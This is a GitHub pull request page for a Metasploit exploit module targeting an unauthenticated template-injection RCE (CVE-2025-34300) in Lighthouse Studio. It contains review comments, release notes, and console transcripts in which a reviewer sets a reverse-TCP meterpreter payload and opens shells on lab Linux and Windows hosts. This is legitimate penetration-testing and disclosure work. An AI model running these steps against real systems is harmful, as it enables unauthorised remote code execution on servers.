Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300)#20397
Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300)#20397jheysel-r7 merged 20 commits intorapid7:masterfrom
Conversation
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
jheysel-r7
left a comment
There was a problem hiding this comment.
Thanks for the module @vognik. A couple comments.
Testing
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set studyname test
studyname => test
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set writabledir /tmp
writabledir => /tmp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Sending stage (3045380 bytes) to 172.16.199.132
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.132:36724) at 2025-07-23 10:39:29 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.16.199.132
OS : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
|
@bwatters-r7, @jheysel-r7 Thanks for the code review and valuable advice! The That's why I had files with
So I still left the override of the default temporary directory (with absolute path), this works quite well |
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
Outdated
Show resolved
Hide resolved
jheysel-r7
left a comment
There was a problem hiding this comment.
Hey @vognik, thanks for making those changes. I was able to test successfully on Windows and everything is looking just about good to go. Just a couple suggestion to the documentation.
Windows Testing
msf6 exploit(multi/http/lighthouse_studio_unauth_rce_cve_2025_34300) > run
[*] Started reverse TCP handler on 172.16.199.131:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Extracting version...
[*] Extracted version: 9.16.12
[+] The target appears to be vulnerable.
[*] Uploading malicious payload...
[*] Sending stage (203846 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.131:4444 -> 172.16.199.135:51051) at 2025-08-13 17:22:25 -0400
meterpreter >
meterpreter > getuid
Server username: DESKTOP-0OPTL76\msfuser
meterpreter > sysinfo
Computer : DESKTOP-0OPTL76
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
Show resolved
Hide resolved
documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md
Outdated
Show resolved
Hide resolved
…uth_rce_CVE_2025_34300.md
Release NotesThis adds a module which exploits a template injection vulnerability in the Sawtooth Software Lighthouse Studio's ciwweb.pl web application in versions prior to 9.16.14. The application fails to properly sanitize user input within survey templates, allowing unauthenticated attackers to inject and execute arbitrary Perl commands on the target system which get run in the context of the user running the web server. |
Changes have been applied, thank you for the review!


Vulnerability Details
This module exploits a template injection vulnerability in the
Sawtooth Software Lighthouse Studio's
ciwweb.plweb application.The application fails to properly sanitize user input within survey templates,
allowing unauthenticated attackers to inject and execute arbitrary Perl commands
on the target system.
This vulnerability affects Lighthouse Studio versions prior to 9.16.14.
Successful exploitation may result in remote code execution under the privileges
of the web server, potentially exposing sensitive data or disrupting survey operations.
An attacker can execute arbitrary system commands as the web server.
Module Information
Module path:
exploit/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300Platform:
Linux/Unix/WindowsTested on:
Ubuntu 18.0.4 / Windows 10Requirements:
NothingReferences
Original Research
https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/
Test Output